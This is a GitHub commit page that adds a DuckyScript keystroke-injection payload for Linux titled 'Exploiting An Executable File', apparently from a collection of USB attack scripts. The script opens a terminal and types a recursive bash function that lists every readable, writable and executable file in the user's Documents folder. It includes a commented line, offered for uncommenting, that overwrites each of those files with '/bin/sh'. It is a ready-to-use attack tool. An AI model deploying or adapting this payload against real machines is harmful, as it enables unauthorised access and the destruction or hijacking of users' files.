Create payload.txt

pull/292/head
Aleff 2023-04-05 18:04:16 +02:00 committed by GitHub
parent 944d8f7e2a
commit df69af38a1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 81 additions and 0 deletions

View File

@ -0,0 +1,81 @@
REM ################################################
REM # |
REM # Title : Exploiting An Executable File |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ################################################
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Script ####
STRING USER=$(whoami)
ENTER
DELAY 500
STRING DIR=/home/$USER/Documents
ENTER
DELAY 500
REM #### Function Definition ####
STRING function search_file {
ENTER
DELAY 500
STRING for file in "$1"/*; do
ENTER
DELAY 500
STRING if [[ -d "$file" ]]; then
ENTER
DELAY 500
STRING search_file "$file"
ENTER
DELAY 500
STRING elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
ENTER
DELAY 500
STRING echo "File Found: $file"
ENTER
DELAY 500
REM Decomment it if you want to put "/bin/sh" into the files, else do what you want
STRING # echo "/bin/sh" > "\$file"
ENTER
DELAY 500
STRING fi
ENTER
DELAY 500
STRING done
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM #### Function Run ####
STRING search_file "$DIR"
ENTER